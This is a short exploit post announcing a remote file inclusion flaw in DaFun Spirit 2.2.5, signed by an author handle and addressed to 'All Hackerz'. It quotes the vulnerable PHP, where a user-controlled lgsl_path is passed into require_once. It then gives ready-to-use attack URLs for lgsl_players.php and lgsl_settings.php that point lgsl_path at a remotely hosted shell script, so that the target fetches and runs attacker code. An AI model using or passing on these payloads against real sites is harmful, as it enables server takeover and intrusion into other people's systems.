\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability
Script: http://code.google.com/p/dafunspirit/downloads/list
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
( )
ooooO ) /
( ) (_/
\ (
\_)
Vuln Code
//-----------------------------------------------------------------------------------------------------------+
$lgsl_path = ""; // RELATIVE PATH BETWEEN THIS FILE AND THE LGSL FOLDER FOR PAGE INTEGRATION
//-----------------------------------------------------------------------------------------------------------+
require_once($lgsl_path."lgsl_protocol.php");
$get_ip = $_GET[ip];
$get_port = $_GET[port];
//-----------------------------------------------------------------------------------------------------------+
Usage: http://[target]/[path]/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]
http://[target]/[path]/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]
Greetings: All Hackerz
